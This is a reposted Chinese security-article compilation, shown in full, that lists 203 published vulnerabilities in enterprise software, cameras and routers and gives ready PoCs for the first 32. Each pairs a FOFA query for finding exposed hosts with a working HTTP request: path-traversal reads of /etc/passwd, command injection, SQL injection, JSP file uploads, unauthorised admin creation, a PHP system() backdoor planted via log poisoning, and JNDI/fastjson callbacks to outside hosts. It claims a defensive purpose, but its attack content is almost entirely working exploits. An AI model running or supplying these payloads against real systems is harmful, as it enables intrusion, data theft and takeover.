Public Internet Vulnerability Compilation, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of attacks in offense/defense exercises; we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 high-impact vulnerability POCs published in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all vulnerabilities listed are public. For patches or remediation plans, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the word PAYLOAD. Search for the full POC yourself if you need it.

Legal rights: if the content infringes any party's legitimate rights, contact the 网络安全新视界 team via the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list" gate. This article is the most complete list at present; press F12 and search for keywords when using it.

Bookmark this article if you need it, or follow this official account (网络安全新视界).

Table of contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo endpoint SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qianxin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qianxin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. Goanywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of a password of your own choosing.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double-URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request that plants the function; the command to execute is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the test range to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA: app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Versions: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
